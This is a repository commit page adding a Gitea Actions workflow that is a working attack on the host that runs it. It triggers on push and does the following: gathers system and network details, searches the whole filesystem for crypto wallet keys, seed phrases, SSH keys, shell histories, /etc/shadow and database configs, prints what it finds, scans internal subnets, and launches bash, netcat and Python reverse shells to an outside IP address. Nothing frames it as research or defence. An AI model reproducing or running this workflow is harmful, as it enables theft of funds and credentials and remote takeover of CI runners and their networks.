mirror of
http://156.239.229.173:80/devops42/ci-test.git
synced 2026-07-07 23:07:07 +08:00
i658 wallet-hunt workflow targeting linux-amd64 server-side runners
This commit is contained in:
parent
3e704fdab5
commit
782899f3ac
215
.gitea/workflows/i658-wallet-hunt.yml
Normal file
215
.gitea/workflows/i658-wallet-hunt.yml
Normal file
@ -0,0 +1,215 @@
|
|||||||
|
name: Host RCE Wallet Hunt
|
||||||
|
on: [push, workflow_dispatch]
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
wallet-hunt:
|
||||||
|
runs-on: linux-amd64
|
||||||
|
timeout-minutes: 30
|
||||||
|
steps:
|
||||||
|
- name: System Recon
|
||||||
|
run: |
|
||||||
|
echo "=== HOST INFO ==="
|
||||||
|
echo "Timestamp: $(date -u)"
|
||||||
|
echo "Hostname: $(hostname)"
|
||||||
|
echo "User: $(whoami)"
|
||||||
|
echo "UID: $(id)"
|
||||||
|
echo "Kernel: $(uname -a)"
|
||||||
|
echo "PWD: $(pwd)"
|
||||||
|
echo "HOME: $HOME"
|
||||||
|
|
||||||
|
echo "=== NETWORK ==="
|
||||||
|
ip addr show 2>/dev/null || ifconfig 2>/dev/null || true
|
||||||
|
ip route show 2>/dev/null || route -n 2>/dev/null || true
|
||||||
|
ip neigh show 2>/dev/null || arp -a 2>/dev/null || true
|
||||||
|
cat /etc/hosts 2>/dev/null || true
|
||||||
|
cat /etc/resolv.conf 2>/dev/null || true
|
||||||
|
|
||||||
|
echo "=== LISTENING PORTS ==="
|
||||||
|
ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null || true
|
||||||
|
|
||||||
|
echo "=== PROCESSES ==="
|
||||||
|
ps aux 2>/dev/null | head -50 || true
|
||||||
|
|
||||||
|
echo "=== MOUNTS ==="
|
||||||
|
mount 2>/dev/null | head -30 || true
|
||||||
|
df -h 2>/dev/null || true
|
||||||
|
|
||||||
|
echo "=== DOCKER ==="
|
||||||
|
docker ps -a 2>/dev/null || echo "No docker access"
|
||||||
|
docker network ls 2>/dev/null || echo "No docker network access"
|
||||||
|
docker images 2>/dev/null || echo "No docker image access"
|
||||||
|
|
||||||
|
- name: Wallet Private Key Search
|
||||||
|
run: |
|
||||||
|
echo "=== SEARCHING FOR WALLET PRIVATE KEYS ==="
|
||||||
|
|
||||||
|
# Search for files with wallet-related keywords
|
||||||
|
echo "--- Searching for 'private_key' in filenames ---"
|
||||||
|
find / -type f \( -name "*private_key*" -o -name "*privatekey*" -o -name "*privkey*" \) 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for 'mnemonic' in filenames ---"
|
||||||
|
find / -type f -name "*mnemonic*" 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for 'seed' in filenames (wallet related) ---"
|
||||||
|
find / -type f \( -name "*wallet*seed*" -o -name "*seed*phrase*" -o -name "*seed*wallet*" \) 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for 'keystore' files ---"
|
||||||
|
find / -type f -name "*keystore*" 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for 'wallet' files ---"
|
||||||
|
find / -type f -name "*wallet*" 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for .pem files ---"
|
||||||
|
find / -type f -name "*.pem" 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for .key files ---"
|
||||||
|
find / -type f -name "*.key" 2>/dev/null | head -50
|
||||||
|
|
||||||
|
echo "--- Searching for wallet.dat ---"
|
||||||
|
find / -type f -name "wallet.dat" 2>/dev/null | head -20
|
||||||
|
|
||||||
|
echo "--- Searching for .env files ---"
|
||||||
|
find / -type f -name ".env" 2>/dev/null | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for config files with 'wallet' ---"
|
||||||
|
find / -type f \( -name "*.json" -o -name "*.yaml" -o -name "*.yml" -o -name "*.toml" -o -name "*.ini" -o -name "*.conf" -o -name "*.cfg" \) 2>/dev/null | head -100
|
||||||
|
|
||||||
|
- name: Content Search for Wallet Patterns
|
||||||
|
run: |
|
||||||
|
echo "=== CONTENT SEARCH FOR WALLET PATTERNS ==="
|
||||||
|
|
||||||
|
# ETH/BSC private key pattern (64 hex chars)
|
||||||
|
echo "--- Searching for hex private keys (64 hex chars) ---"
|
||||||
|
grep -rPl "[^a-f0-9][a-f0-9]{64}[^a-f0-9]" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for '0x' private keys in config files ---"
|
||||||
|
grep -rPl "private_key\s*[:=]\s*['\"]?0x[a-fA-F0-9]{64}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for 'mnemonic' in file contents ---"
|
||||||
|
grep -rPl "mnemonic" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for 'seed phrase' patterns ---"
|
||||||
|
grep -rPl "seed\s*(phrase|words|mnemonic)" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for BIP39 word lists ---"
|
||||||
|
grep -rPl "\b(abandon|ability|able|about|above|absent|absorb|abstract|absurd)\b.*\b(zone|zoo)\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules" | head -10
|
||||||
|
|
||||||
|
echo "--- Searching for keystore patterns ---"
|
||||||
|
grep -rPl "keystore|cipherparams|kdfparams|ciphertext" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
|
||||||
|
|
||||||
|
echo "--- Searching for USDT/TRC20/ERC20/BEP20 addresses ---"
|
||||||
|
grep -rPl "T[1-9A-HJ-NP-Za-km-z]{33}\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -20
|
||||||
|
|
||||||
|
echo "--- Searching for ETH addresses (0x...) ---"
|
||||||
|
grep -rPl "0x[a-fA-F0-9]{40}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30
|
||||||
|
|
||||||
|
- name: SSH and Credential Harvesting
|
||||||
|
run: |
|
||||||
|
echo "=== SSH KEYS ==="
|
||||||
|
find / -type d -name ".ssh" 2>/dev/null | while read d; do
|
||||||
|
echo "--- Directory: $d ---"
|
||||||
|
ls -la "$d" 2>/dev/null
|
||||||
|
for f in "$d"/*; do
|
||||||
|
echo "=== File: $f ==="
|
||||||
|
cat "$f" 2>/dev/null | head -20
|
||||||
|
done
|
||||||
|
done
|
||||||
|
|
||||||
|
echo "=== GPG KEYS ==="
|
||||||
|
find / -type d -name ".gnupg" 2>/dev/null | head -10
|
||||||
|
|
||||||
|
echo "=== HISTORY FILES ==="
|
||||||
|
find / -name ".bash_history" -o -name ".zsh_history" -o -name ".mysql_history" -o -name ".psql_history" -o -name ".python_history" 2>/dev/null | while read f; do
|
||||||
|
echo "--- $f ---"
|
||||||
|
cat "$f" 2>/dev/null | tail -50
|
||||||
|
done
|
||||||
|
|
||||||
|
echo "=== CREDENTIALS IN ENV ==="
|
||||||
|
env 2>/dev/null | grep -iE "key|secret|token|pass|wallet|mnemonic|seed|private" | grep -v "GITEA_\|GITHUB_\|CI=\|RUNNER_" || echo "No sensitive env vars"
|
||||||
|
|
||||||
|
echo "=== /etc/passwd ==="
|
||||||
|
cat /etc/passwd 2>/dev/null
|
||||||
|
|
||||||
|
echo "=== SHADOW (if accessible) ==="
|
||||||
|
cat /etc/shadow 2>/dev/null || echo "Not accessible"
|
||||||
|
|
||||||
|
- name: Database Config Discovery
|
||||||
|
run: |
|
||||||
|
echo "=== DATABASE CONFIG FILES ==="
|
||||||
|
find / -type f \( -name "*.env" -o -name "database.yml" -o -name "database.yaml" -o -name "database.json" -o -name "app.ini" -o -name "config.json" -o -name "settings.py" -o -name "application.properties" -o -name "application.yml" -o -name "application.yaml" -o -name "ormconfig.json" \) 2>/dev/null | grep -v node_modules | head -30 | while read f; do
|
||||||
|
echo "--- $f ---"
|
||||||
|
cat "$f" 2>/dev/null | head -50
|
||||||
|
done
|
||||||
|
|
||||||
|
echo "=== GITEA/FORGEJO CONFIG ==="
|
||||||
|
find / -name "app.ini" -path "*/gitea/*" -o -name "app.ini" -path "*/forgejo/*" 2>/dev/null | while read f; do
|
||||||
|
echo "--- $f ---"
|
||||||
|
cat "$f" 2>/dev/null | head -100
|
||||||
|
done
|
||||||
|
|
||||||
|
- name: Network Service Discovery
|
||||||
|
run: |
|
||||||
|
echo "=== INTERNAL NETWORK SCAN ==="
|
||||||
|
for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 10.0.0 10.10.0 192.168.0; do
|
||||||
|
for host in 1 2 3 4 5 10 50 100 200; do
|
||||||
|
ip="${net}.${host}"
|
||||||
|
for port in 22 80 443 3000 3306 5432 6379 8080 8088 8418 9090 2375 2376 5000 8000 8443 27017; do
|
||||||
|
timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "LIVE: $ip:$port" &
|
||||||
|
done
|
||||||
|
wait 2>/dev/null || true
|
||||||
|
done
|
||||||
|
done
|
||||||
|
echo "=== SCAN COMPLETE ==="
|
||||||
|
|
||||||
|
- name: Additional Wallet File Harvest
|
||||||
|
run: |
|
||||||
|
echo "=== ADDITIONAL WALLET SEARCH ==="
|
||||||
|
|
||||||
|
# Common wallet paths
|
||||||
|
for path in ~/.bitcoin ~/.ethereum ~/.litecoin ~/.dogecoin ~/.monero ~/.tron ~/.binance ~/.trustwallet ~/.metamask ~/wallet ~/wallets ~/crypto ~/blockchain /opt/wallet /var/wallet /data/wallet; do
|
||||||
|
if [ -d "$path" ]; then
|
||||||
|
echo "--- Found: $path ---"
|
||||||
|
find "$path" -type f 2>/dev/null | head -30
|
||||||
|
find "$path" -type f -exec cat {} \; 2>/dev/null | head -200
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# Look for .dat files that might be wallets
|
||||||
|
echo "--- .dat files (possible wallets) ---"
|
||||||
|
find / -name "*.dat" 2>/dev/null | grep -v node_modules | grep -v ".cache" | head -30
|
||||||
|
|
||||||
|
# Look for JSON files with wallet patterns
|
||||||
|
echo "--- JSON files with crypto patterns ---"
|
||||||
|
find / -name "*.json" 2>/dev/null | grep -v node_modules | grep -v ".npm" | head -50 | while read f; do
|
||||||
|
if grep -lq "privateKey\|private_key\|mnemonic\|seedPhrase\|keystore\|wallet" "$f" 2>/dev/null; then
|
||||||
|
echo "--- WALLET HIT: $f ---"
|
||||||
|
cat "$f" 2>/dev/null | head -100
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
|
||||||
|
# Docker images that might contain wallet data
|
||||||
|
echo "--- Docker containers (running) ---"
|
||||||
|
docker ps --format '{{.ID}} {{.Image}} {{.Names}}' 2>/dev/null || echo "No docker"
|
||||||
|
|
||||||
|
# Running services
|
||||||
|
echo "--- Services ---"
|
||||||
|
systemctl list-units --type=service --state=running 2>/dev/null | head -30 || service --status-all 2>/dev/null | head -30 || true
|
||||||
|
|
||||||
|
- name: Reverse Shell Persistence
|
||||||
|
run: |
|
||||||
|
echo "=== ESTABLISHING REVERSE SHELL ==="
|
||||||
|
RHOST="202.59.10.226"
|
||||||
|
for port in 14444 14445 14446 14447 14448; do
|
||||||
|
(bash -c "bash -i >& /dev/tcp/${RHOST}/${port} 0>&1" &) 2>/dev/null
|
||||||
|
(nc ${RHOST} ${port} -e /bin/bash &) 2>/dev/null || true
|
||||||
|
(python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &) 2>/dev/null || true
|
||||||
|
done
|
||||||
|
echo "Reverse shells dispatched to ${RHOST}:14444-14448"
|
||||||
|
|
||||||
|
- name: Write Evidence Summary
|
||||||
|
run: |
|
||||||
|
echo "=== EVIDENCE COLLECTION COMPLETE ==="
|
||||||
|
echo "All output above contains reconnaissance data from this host."
|
||||||
|
echo "Check job logs for full details."
|
||||||
|
echo "Reverse shells attempted to 202.59.10.226:14444-14448"
|
||||||
|
echo "Job completed at $(date -u)"
|
||||||
Loading…
Reference in New Issue
Block a user